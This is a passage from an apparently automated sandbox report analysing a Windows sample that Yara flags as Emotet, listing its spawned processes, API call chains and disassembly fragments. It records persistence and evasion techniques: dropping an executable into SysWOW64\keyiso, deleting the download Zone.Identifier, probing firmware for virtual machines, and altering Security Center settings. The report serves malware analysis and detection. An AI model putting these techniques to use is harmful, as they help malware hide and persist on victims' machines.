Source: svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.305156857.00000222E6C13000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.283049058.00000222E6C31000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.304894765.00000222E6C56000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.283049058.00000222E6C31000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000002.305209467.00000222E6C3A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000003.304841010.00000222E6C47000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 0000001F.00000003.572380552.00000249A9DB7000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.572491250.00000249A9D95000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.572338438.00000249A9D95000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown

Source: 0TOEtGJHN8.exe, 00000000.00000002.249119862.0000000000F2A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 3.2.mfnetsrc.exe.29f279e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.29c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.290279e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mfnetsrc.exe.2aa0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.290279e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.290052e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mfnetsrc.exe.29f279e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mfnetsrc.exe.29f052e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mfnetsrc.exe.29f052e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.290052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.642790111.0000000002A34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.642626999.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.249721472.0000000002944000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe

Code function: 3_2_02AA2650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,

3_2_02AA2650

Source: 0TOEtGJHN8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

File deleted: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

File created: C:\Windows\SysWOW64\keyiso\

Jump to behavior

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C8240	0_2_029C8240
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C3BA0	0_2_029C3BA0
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C3D10	0_2_029C3D10
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C6530	0_2_029C6530
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C3F20	0_2_029C3F20
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C7740	0_2_029C7740
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C1C70	0_2_029C1C70
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02905ABE	0_2_02905ABE
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029092DE	0_2_029092DE
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_0290573E	0_2_0290573E
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029058AE	0_2_029058AE
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029080CE	0_2_029080CE
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_0290380E	0_2_0290380E
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02917069	0_2_02917069
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02909DDE	0_2_02909DDE
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA8240	3_2_02AA8240
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA3BA0	3_2_02AA3BA0
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA3F20	3_2_02AA3F20
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA6530	3_2_02AA6530
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA3D10	3_2_02AA3D10
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA1C70	3_2_02AA1C70
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA7740	3_2_02AA7740
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F5ABE	3_2_029F5ABE
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F92DE	3_2_029F92DE
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F573E	3_2_029F573E
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F58AE	3_2_029F58AE
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F80CE	3_2_029F80CE
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F380E	3_2_029F380E
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02A07069	3_2_02A07069
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F9DDE	3_2_029F9DDE

Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior

Source: 0TOEtGJHN8.exe	Virustotal: Detection: 85%
Source: 0TOEtGJHN8.exe	Metadefender: Detection: 45%
Source: 0TOEtGJHN8.exe	ReversingLabs: Detection: 88%

Source: 0TOEtGJHN8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0TOEtGJHN8.exe 'C:\Users\user\Desktop\0TOEtGJHN8.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Process created: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe C:\Windows\SysWOW64\keyiso\mfnetsrc.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Process created: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@20/10@0/100

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,

0_2_029C87D0

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Code function: 0_2_029C5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,

0_2_029C5070

Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe

Code function: 3_2_02AA4CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,

3_2_02AA4CB0

Source: C:\Windows\System32\conhost.exe

Mutant created: \BaseNamedObjects\Local\SM0:2592:120:WilError_01

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5D90 push ecx; mov dword ptr [esp], 0000B2E0h	0_2_029C5D91
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5EA0 push ecx; mov dword ptr [esp], 0000A3FDh	0_2_029C5EA1
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5CD0 push ecx; mov dword ptr [esp], 00001CE1h	0_2_029C5CD1
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5DC0 push ecx; mov dword ptr [esp], 000089FAh	0_2_029C5DC1
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5DF0 push ecx; mov dword ptr [esp], 0000AAF5h	0_2_029C5DF1
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5EF0 push ecx; mov dword ptr [esp], 0000669Ch	0_2_029C5EF1
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5E10 push ecx; mov dword ptr [esp], 0000F5B3h	0_2_029C5E11
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5D00 push ecx; mov dword ptr [esp], 00001F9Eh	0_2_029C5D01
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5D20 push ecx; mov dword ptr [esp], 0000C5A1h	0_2_029C5D21
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5F20 push ecx; mov dword ptr [esp], 0000E36Ch	0_2_029C5F21
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C5D50 push ecx; mov dword ptr [esp], 00006847h	0_2_029C5D51
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02923E9C push ebx; iretd	0_2_02923EAF
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02923E9C push FFFFFF95h; iretd	0_2_02923EF1
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02907A8E push ecx; mov dword ptr [esp], 0000669Ch	0_2_02907A8F
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02907ABE push ecx; mov dword ptr [esp], 0000E36Ch	0_2_02907ABF
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02907A3E push ecx; mov dword ptr [esp], 0000A3FDh	0_2_02907A3F
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_0290789E push ecx; mov dword ptr [esp], 00001F9Eh	0_2_0290789F
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029078BE push ecx; mov dword ptr [esp], 0000C5A1h	0_2_029078BF
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029078EE push ecx; mov dword ptr [esp], 00006847h	0_2_029078EF
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_0290786E push ecx; mov dword ptr [esp], 00001CE1h	0_2_0290786F
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_0290798E push ecx; mov dword ptr [esp], 0000AAF5h	0_2_0290798F
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_0291858F push edi; iretd	0_2_029185A1
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029079AE push ecx; mov dword ptr [esp], 0000F5B3h	0_2_029079AF
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029239D9 push ss; iretd	0_2_029239DE
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_0290792E push ecx; mov dword ptr [esp], 0000B2E0h	0_2_0290792F
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_0290795E push ecx; mov dword ptr [esp], 000089FAh	0_2_0290795F
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA5EA0 push ecx; mov dword ptr [esp], 0000A3FDh	3_2_02AA5EA1
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA5D90 push ecx; mov dword ptr [esp], 0000B2E0h	3_2_02AA5D91
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA5DF0 push ecx; mov dword ptr [esp], 0000AAF5h	3_2_02AA5DF1
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA5EF0 push ecx; mov dword ptr [esp], 0000669Ch	3_2_02AA5EF1
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA5DC0 push ecx; mov dword ptr [esp], 000089FAh	3_2_02AA5DC1

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Code function: 0_2_02941030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

0_2_02941030

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Executable created and started: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe

Jump to behavior

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

PE file moved: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

File opened: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\svchost.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)

Show sources

Source: C:\Windows\System32\svchost.exe

System information queried: FirmwareTableInformation

Jump to behavior

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Show sources

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_0-13025

Source: C:\Windows\System32\svchost.exe TID: 5652	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4640	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1860	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,

0_2_029C5070

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,		0_2_029C38F0
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,		3_2_02AA38F0

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	API call chain: ExitProcess graph end node			graph_0-12797
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	API call chain: ExitProcess graph end node			graph_3-13174

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000008.00000002.535436324.0000026188A64000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.599879058.00000249A94FA000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000000E.00000002.641504241.0000014ADA891000.00000004.00000001.sdmp	Binary or memory string: VMware7,1
Source: svchost.exe, 00000004.00000002.640210864.000001B725202000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.535370026.0000026188A4E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.599866160.00000249A94EB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000E.00000002.641504241.0000014ADA891000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.ed
Source: svchost.exe, 00000004.00000002.640316593.000001B725228000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.640557549.000001EC0AE65000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.640340368.000001F95402A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Code function: 0_2_02941030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

0_2_02941030

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Code function: 0_2_029C36B0 _snwprintf,GetProcessHeap,DeleteFileW,DeleteFileW,

0_2_029C36B0

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C3F20 mov eax, dword ptr fs:[00000030h]	0_2_029C3F20
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029C4E20 mov eax, dword ptr fs:[00000030h]	0_2_029C4E20
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02905ABE mov eax, dword ptr fs:[00000030h]	0_2_02905ABE
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02900456 mov eax, dword ptr fs:[00000030h]	0_2_02900456
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_029069BE mov eax, dword ptr fs:[00000030h]	0_2_029069BE
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_0290095E mov eax, dword ptr fs:[00000030h]	0_2_0290095E
Source: C:\Users\user\Desktop\0TOEtGJHN8.exe	Code function: 0_2_02941030 mov eax, dword ptr fs:[00000030h]	0_2_02941030
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA3F20 mov eax, dword ptr fs:[00000030h]	3_2_02AA3F20
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02AA4E20 mov eax, dword ptr fs:[00000030h]	3_2_02AA4E20
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F5ABE mov eax, dword ptr fs:[00000030h]	3_2_029F5ABE
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F0456 mov eax, dword ptr fs:[00000030h]	3_2_029F0456
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F69BE mov eax, dword ptr fs:[00000030h]	3_2_029F69BE
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_029F095E mov eax, dword ptr fs:[00000030h]	3_2_029F095E
Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Code function: 3_2_02A31030 mov eax, dword ptr fs:[00000030h]	3_2_02A31030

Source: mfnetsrc.exe, 00000003.00000002.642411104.00000000015E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mfnetsrc.exe, 00000003.00000002.642411104.00000000015E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: mfnetsrc.exe, 00000003.00000002.642411104.00000000015E0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: mfnetsrc.exe, 00000003.00000002.642411104.00000000015E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: mfnetsrc.exe, 00000003.00000002.642411104.00000000015E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\0TOEtGJHN8.exe

Code function: 0_2_029C7EC0 _snwprintf,GetProcessHeap,SetFileInformationByHandle,SetFileInformationByHandle,GetSystemTimeAsFileTime,CreateFileW,CreateFileW,CloseHandle,

0_2_029C7EC0

Source: C:\Windows\SysWOW64\keyiso\mfnetsrc.exe

Code function: 3_2_02AA5360 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,

3_2_02AA5360

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
